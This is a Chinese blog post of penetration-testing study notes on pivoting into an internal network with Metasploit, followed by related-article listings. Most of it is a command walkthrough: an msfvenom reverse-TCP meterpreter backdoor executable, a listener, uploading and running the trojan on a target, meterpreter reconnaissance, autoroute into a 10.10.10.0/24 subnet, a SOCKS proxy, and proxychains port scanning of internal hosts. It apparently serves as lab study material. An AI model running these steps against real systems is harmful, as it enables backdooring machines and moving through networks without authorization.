20210215web渗透学习之跨路由扫描

最新推荐文章于 2022-11-16 22:03:05 发布
最新推荐文章于 2022-11-16 22:03:05 发布
阅读量266 收藏
点赞数
分类专栏: WEB渗透学习
原文链接:https://blog.csdn.net/weixin_43970718/article/details/114478726
版权

在这里插入图片描述

生成metasploit后门

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.196  lport=12345 -f exe >/var/www/html/s.exe

  
  
  
  
  • 1

kali监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.196

set lport 12345

exploit

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

手动上传木马文件到目标机器,并执行。

msf绘画中常用命令

查看当前用户					getuid

进入cmd交互shell界面 Shell

Systeminfo //在cmd交互shell下执行,显示目标系统信息。

获取网卡信息 ifconfig

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

路由信息

run get_local_subnets		//可以用此命令查看目标机器所在内网网端信息与公网网端信息。

 
 
 
 
  • 1

在这里插入图片描述

增加路由

run autoroute -s 10.10.10.0/24

//添加一条通向目标服务器内网的路由,即让目标路由分配给当前kali一个内网IP。

//此时,msf就可以直接访问目标内网中其他机器。

  • 1
  • 2
  • 3

run autoroute –p

//查看有没有新增成功,下图这种出现结果即表明新增成功。

 
 
 
 
  • 1

在这里插入图片描述

Background

//返回,把meterpreter后台挂起

 
 
 
 
  • 1

开启socks 4代理

use auxiliary/server/socks4a

// 让Metasploit可以作为一个SOCKS代理服务器

Set srvport 10044 //设置服务端口

  • 1
  • 2
  • 3

在这里插入图片描述

修改本机kali的网络配置文件

/etc/prxoychains.conf

 
 
 
 
  • 1

在这里插入图片描述

扫描/访问内网其他机器

新开一个窗口扫描端口服务,扫描内网中其他机器端口开放情况。

 
 
 
 
  • 1

在这里插入图片描述

扫描到80端口开放;另外这个速度有一点慢。

采用tcp扫描,禁止ping操作。

  • 1
  • 2
  • 3

也可以扫描一些其他常用端口:
在这里插入图片描述

如果全是timeout那么就应该思考一下,是不是配置出错。

如msf里端口,或者/etc/prxoychains.conf文件内容不对。

  • 1
  • 2
  • 3

也可以用proxychains代理火狐访问一些其他内网机器
在这里插入图片描述

热热的雨夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Web安全学习笔记-Web-Sec Documentation
01-30
文档教导读者如何通过网络入口、域名信息、端口扫描和站点分析等方法来收集目标系统的初步情报,为后续的渗透测试或安全评估做准备。 总的来说,这份Web-Sec Documentation是一份全面的Web安全指南,不仅包含了网络...
基于python+nweb渗透测试工具(django)源码数据库演示.zip
06-16
《基于Python+NWeb的渗透测试工具(Django)源码数据库演示详解》 渗透测试是网络安全领域中的一个重要环节,它通过模拟黑客攻击手段来评估系统的安全性。本项目以Python编程语言和Django框架为基础,构建了一个...
内网渗透思路03之路由扫描
划水的小白白
03-07 891
生成metasploit后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=12345 -f exe >/var/www/html/s.exe kali监听 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.196 set lport 12345 exploit .
内网路由扫描
qq_45300786的博客
05-19 520
思路 我们已经拿到了08这台机器的权限了,然后我们想移动到10段这台机器,这个时候,我们就可以通过添加路由的方法来访问到10这台机器。 获取网段 配置代理
路由扫描介绍
实践求真知
11-22 893
一 作用 查询一个主机到另外一个主机的经过路由的跳数、以及数据延迟情况。   二 常用工具 traceroute、mtr   三 mtr特点 能测试出主机到每一个路由间的联通性。   四 traceroute原理     大小: 108.8 KB 查看图片附件
浅析内网渗透代理
anquanzushiye的博客
08-01 1075
作者:zjun原文:https://xz.aliyun.com/t/8001这篇文章列举出我用过的内网代理方法,也算是对内网渗透代理姿势的巩固,也方便日后查阅。MeterpreterMe...
内网渗透隧道技术的相关知识
qq_44029310的博客
07-16 890
以前的暗月课程自学笔记整理。
一款基于Python-Django的多功能Web安全渗透测试工具源码.zip
05-08
此工具中的漏洞扫描功能可以自动检测常见的Web漏洞,如SQL注入、XSS站脚本、CSRF站请求伪造、文件包含漏洞等。端口扫描则能识别目标系统开放的服务和端口,从而发现可能的安全风险。指纹识别技术可以通过分析...
python毕业设计之nweb渗透测试工具(django)源码.zip
07-14
Python毕业设计中的“nweb渗透测试工具”是一个基于Django框架开发的应用,旨在提供网络安全性评估的功能。这个项目的核心目标是教会学生如何利用Python和Django来构建一个实用的网络安全工具,同时也展示了Web安全...
python127nweb渗透测试工具(django).rar
最新发布
04-26
在Python127nWeb中,可能包括了常见的漏洞扫描、SQL注入检测、站脚本(XSS)检测、站请求伪造(CSRF)检测等功能。这些功能可以帮助开发者识别并修复他们的Web应用中的安全漏洞。 数据库部分是Web应用程序的...
内网渗透之路由访问
qq_56426046的博客
11-16 1322
在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网, 如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做 跳板访问目标主机 获取内网网卡命令。msf使用隧道模块 默认是使用socks5 也可以选择socks4a。绑定路由 不绑定路由就没法访问目标主机。使用代理隧道nmap扫描内网主机。末将于禁,愿为曹家世代赴汤蹈火。msf 使用代理访问目标。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4152
内网渗透木马测试
路由扫描
huangbaokang的博客
07-09 3816
作用:查询一个主机到另一个主机的经过的路由的跳数、及数据延迟情况。 常用工具:traceroute mtr mtr特点:能测试出主机到每一个路由间的连通性。 以下重点介绍traceroute命令。 traceroute原理 这些程序是利用IP数据包的存活时间(TTL)值来实现其功能的。 当一台计算机发送IP数据包时,会为数据包设置存活时间(TTL)值。每当数据包经过一个路由...
网段扫描工具SoftPerfect Network Scanner
gsls200808的专栏
10-30 1万+
从网上搜索了很多工具,发现大部分工具虽然声称能网段扫描IP-MAC-主机名,实际上都只是扫描出了本地网段,至于是什么软件,就不一一列举了,以后就在CSDN安家了,主要的技术性文章都会在这发
记一次MSF综合应用内网渗透记录
渗透测试研究中心
01-19 958
0x01 前言随机找的个台湾某越科技集团下的站点作为此次测试目标,只是为了学习下内网渗透和MSF的使用。13年9月份时拿到了一个子域的Webshell权限后就没再继续测试了,当时服务器没有安装Symantec赛门铁克,但第二次去测试时发现已安装了Symantec,并进行了一些安全加固。0x02 网站和内网的基本信息搜集基本信息探测:目标站点:http://www.ttes*****.com服务器...
内网渗透-做代理流量转发-msf网段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理
BING
05-17 2264
0x01代理-windows中ew和proxifier 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s sscoked -l 8000 2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口 3.设置代理规则 第一步截图: 第二步截图: 第三步截图: 你可以使用代理了 0x02代理-kali中ew和proxychains4做代理 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s
Metasploit 「网段攻击」添加路由
时光途径
06-09 5668
情况? Mac【Metasploit】:192.168.43.100 Win7【跳板机】:192.168.215.144【Nat】、172.16.63.128【仅主机】 Linux【目标机】:172.16.63.129【仅主机】,开启80端口方便检测验证 需要解释下这里跳板机为啥采用Nat方式获取ip,而不是桥接?因为主机Mac上网是连的CMCC-EDU,在校也很无奈额... ...
红队渗透测试攻防学习资源大全
"红队渗透测试攻防学习工具分析研究资料汇总.pdf" 是一份全面的资料集合,旨在帮助学习者深入了解红队渗透测试和攻防技术。这份资料涵盖了多个方面的内容,包括但不限于学习手册、攻防测试手册、内网安全文档、工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值